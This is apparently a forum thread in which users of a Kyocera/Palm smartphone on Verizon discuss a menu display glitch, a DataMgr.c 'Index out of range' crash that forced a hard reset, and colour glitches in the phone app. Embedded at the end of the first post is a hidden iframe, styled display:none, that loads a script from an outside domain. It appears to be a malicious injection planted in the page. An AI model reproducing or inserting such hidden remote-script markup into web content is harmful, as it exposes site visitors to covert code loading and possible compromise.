I noticed a "box" as the first S in Messages on the Phone app's menu. So I did a soft reset and got the following crash:

DataMgr.c Line:9573 Index out of range

I could not do a soft reset after this without this fatal error, so I had to hard reset and restore all my data.

Anyone else experience this? Or, other crashes? Has anyone contacted Kyocera or Verizon about their crashes?

It seems to crash a bit more often that my older Palms did.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I had the exact same box appear at the exact same place a couple of weeks ago. A soft reset fixed it. I did not get the error message you did, nor did I have to do a hard reset. Also, the font on the phone app is sometimes green or orange if the phone rings and i take the call while i'm in another app that has those colors as their main color, for example, AcidImage. Again, closing the app or simply exiting the phone app and then going back to it, fixes the problem for mer. It's only happened a couple of times.
